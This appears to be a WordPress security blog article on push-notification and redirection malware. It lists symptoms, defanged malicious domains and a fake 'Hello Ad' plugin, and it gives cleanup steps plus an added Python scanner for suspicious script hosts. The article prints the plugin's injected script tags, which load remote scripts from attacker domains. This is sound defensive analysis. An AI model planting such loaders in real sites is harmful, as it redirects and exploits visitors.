Last Updated: 30th July, 2022
WordPress Push Notification and Redirection Malware: This article covers both the push notification malware on WordPress and the ongoing redirection malware campaign on WordPress websites. Malicious domains that visitors are redirected to include justcannabis [dot] online, iclickcdn [dot] com, asoulrox [dot] com and inpagepush [dot] com.
This season, hackers have taken the campaign one step further by adding a genuine-looking ‘Hello Ad‘ plugin to compromised WordPress websites. Details follow.
WordPress Push Notification And Redirection Malware Symptoms
1. Vulgar Push Notifications: Visitors to your website are shown malicious/vulgar push notifications.
2. Website Redirection: Clicking a link on your website (which should lead to a page inside your WordPress site) redirects the visitor to a malicious website.
Malicious domains used for the redirection include justcannabis [dot] online, iclickcdn [dot] com, asoulrox [dot] com and inpagepush [dot] com.
3. Unknown Plugins Found: In some of these cases we have found a new malicious plugin named ‘Hello Ad‘ installed in WordPress.
4. Mobile-Only Or Device-Specific Behavior: Users have found that this malware hides itself well. It does not send push notifications or redirect users every time; the behavior is device sensitive. The malware often displays push alerts only on mobile devices, and it often redirects only new visitors, not those who have accessed the website recently.
Malicious Hello Ad Plugin Bizarre Instance
Users have also seen a ‘Hello Ad‘ plugin installed on the affected websites to redirect visitors to websites managed by hackers. This legitimate-sounding plugin adds the following malicious JavaScript code to the page source:
<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn(dot)com(forward slash - /)tag(dot)min(dot)js',3336627,document.body||document.documentElement)</script>
<script src="https://asoulrox(dot)com/pfe/current(forward slash - /)tag(dot)min(dot)js?z=3336643" data-cfasync="false" async></script>
<script type="text/javascript" src="//inpagepush(dot)com(forward slash - /)400(forward slash - /)3336649" data-cfasync="false" async="async"></script>
The code of this plugin plays a major role in creating the redirection. With every new campaign, users have seen hackers refine this approach.
How To Fix WordPress Push Notification And Redirection Malware, Hello Ad And Redirection Hack
1. Look In The Obvious Locations First: Hackers have certain favorite locations in which they install the malware code. When you start cleaning your WordPress site, the best way to proceed is to begin with these. Focus first on the following files:
.htaccess
index.php
wp-content/themes/{themeName}/functions.php
wp-config.php
Core theme files
2. Find And Remove Hello Ad Plugin: If you notice this plugin and assume it is legitimate because it looks genuine, or because your developer or you may have installed it in the past, please uninstall it, because that is not the case.
3. Removing Redirection: Redirection attacks on WordPress have been happening for a long time. To clean up malicious redirection hacks you need to inspect the database tables, the core source code and, quite often, the configuration files of your server.
Search for scripts and other resources loaded from unidentified URLs. Hackers keep upgrading their methods to stay off the radar of security firms, but the underlying concept is much the same.
Hackers often adapt their techniques, exploit vulnerabilities that are not yet known to the community, and combine multiple exploits to design a hack.
It is quite a work of art indeed, for them and for those who decode it too! While removing the hack is one aspect, it takes something more lasting to ensure the site never gets hacked again.
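The file checks in steps 1 and 3 above can be scripted. The following is an added example, not code from the original article: it walks the root-level files listed in step 1 plus everything under wp-content, and reports every quoted external URL host that is either one of the domains named in this article or not on an allowlist. The function names and the ALLOWED hosts are assumptions chosen for illustration.

```python
import re
import sys
from pathlib import Path

# Domains named in this article, kept defanged and re-armed only for matching.
KNOWN_BAD = {d.replace("[.]", ".") for d in (
    "justcannabis[.]online", "iclickcdn[.]com", "asoulrox[.]com", "inpagepush[.]com")}
# Root-level files the article says to check first; themes and plugins are walked.
PRIORITY = (".htaccess", "index.php", "wp-config.php")
# A quoted absolute or protocol-relative URL: matches <script src="..."> and the
# inline loader form, where the URL is passed as a JavaScript string.
URL_RE = re.compile(r"""["'](?:https?:)?//([a-z0-9-]+(?:\.[a-z0-9-]+)+)""", re.I)

def classify(host, allowed):
    """Return 'known-bad', 'unknown', or None when the host is allowlisted."""
    def under(domains):
        return any(host == d or host.endswith("." + d) for d in domains)
    if under(KNOWN_BAD):
        return "known-bad"
    return None if under(allowed) else "unknown"

def scan_text(text, allowed):
    """Return [(line_no, host, verdict)] for each external host needing review."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        for host in URL_RE.findall(line):
            verdict = classify(host.lower(), allowed)
            if verdict:
                hits.append((no, host.lower(), verdict))
    return hits

def scan_site(root, allowed):
    """Scan the priority files plus every PHP/JS/HTML file under wp-content."""
    root = Path(root)
    files = [root / name for name in PRIORITY]
    files += [f for f in (root / "wp-content").rglob("*")
              if f.suffix.lower() in (".php", ".js", ".html")]
    hits = []
    for f in sorted(files):
        if f.is_file():
            text = f.read_text(errors="replace")
            hits += [(f.relative_to(root).as_posix(), *h) for h in scan_text(text, allowed)]
    return hits

if __name__ == "__main__":
    # ALLOWED is an assumption: replace with your own domain and hosts you trust.
    ALLOWED = {"example.com", "wordpress.org", "w.org"}
    for hit in scan_site(sys.argv[1] if len(sys.argv) > 1 else ".", ALLOWED):
        print(*hit, sep="\t")
```

A file scan does not cover scripts injected into database tables, which step 3 also asks you to inspect; "unknown" hits are review candidates, not confirmed infections.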
1 Comment
Great information! Thank you for sharing valuable information about the WordPress push notification.